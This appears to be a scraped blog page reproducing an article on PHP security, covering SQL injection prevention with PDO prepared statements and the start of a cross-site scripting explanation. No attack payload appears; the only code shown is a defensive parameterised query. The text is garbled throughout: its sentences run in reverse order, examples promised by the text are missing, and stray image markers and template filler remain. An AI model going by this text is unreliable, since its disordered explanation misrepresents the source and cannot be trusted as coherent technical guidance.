12/12/2023 0 Comments O reilly programming php![]() ![]() Cross-Site ScriptingĬross-site scripting (XSS) is an attack where user output is blindly echoed back out to the browser unfiltered and unvalidated. Using bound parameters is a good (and effective) first line of defense to keeping your application safe from SQL injection. Imagine the kind of problems that might be caused if you allowed something like: The thing that makes this different is that the value passed in isn’t a part of a SQL statement built as a string. Prepare('select foo from baz where bar = :one') Here’s an example that could go a long way to help prevent SQL injection issues: ![]() You can use the built-in database abstraction layer, PDO, and it’s prepared statements feature. Scary, right? Well, there’s one easy thing you can do in PHP that can help with this. If you’re not escaping or filtering what the user is giving you, that value could be anything. For example, say an input in your script comes from the $_GET superglobal. Basically, this is an attack where the person wanting access to the system uses a specially formatted string as a part of an input that gets down into the database level and executes a malicious command. If you keep up with security at all, you’ve undoubtedly seen articles about break-ins and hacks of large companies (smaller ones too) that were a result of something called a SQL injection (SQLi) flaw. Here’s a quick look at how to help prevent just a few: The most common ones come from the well known OWASP Top 10 list. There’s still some common dangers, though, that you as a PHP developer should be aware of. PHP, by its nature is “meant to die” at the end of every request, so the developers don’t have to worry about some things that more persistent languages do. People put down PHP for not being secure, but they forget that it’s not the language that makes for insecure code, it’s the developer. Ruby’s had several major vulnerabilities in the press lately and Java has definitely had its own list over its extensive lifetime. ![]() Sure, PHP’s not without its problems-but any language is going to have its share. They’ll hear it from their peers using other languages that PHP is “sloppy” or that “it’s just a scripting language, not a real one.” There’s one other that seems to follow the language around as well-that it’s insecure. As any PHP developer that’s been around for a while will tell you, there’s a certain kind of stigma that comes with the language. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |